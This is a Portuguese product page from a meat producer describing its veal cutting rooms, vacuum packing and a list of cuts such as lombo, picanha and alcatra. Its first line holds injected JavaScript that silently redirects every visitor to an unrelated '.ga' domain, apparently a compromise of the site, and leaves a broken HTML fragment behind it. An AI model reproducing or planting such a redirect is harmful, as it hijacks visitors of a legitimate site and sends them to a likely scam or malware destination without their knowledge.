window.location.replace("https://otepflath.ga/help/?15131619432237");window.location.href = "https://otepflath.ga/help/?15131619432237";lang="pt-pt" id="arve"> Vitelão – Campicarn

Vitelão

Peças - Vitelão

Nas salas de desmancha, com capacidade para desossar e desmanchar 500 carcaças por dia, o processo é realizado de acordo com diferentes padrões de corte em função das necessidades dos clientes.

Os cortes são comercializados em fresco ou embalados em vácuo.

O embalamento a vácuo mantém a carne fresca e ainda mais tenra (conservada entre os 0ºC e os 4ºC).

Lombo

0 out of 5

Costeleta

0 out of 5

Carré

0 out of 5

Vazia

0 out of 5

Acém Redondo

0 out of 5

Coração Alcatra

0 out of 5

Picanha

0 out of 5

Alcatra

0 out of 5

Maminha

0 out of 5

Ganso Redondo

0 out of 5

Pojadouro

0 out of 5

Rabadilha

0 out of 5
X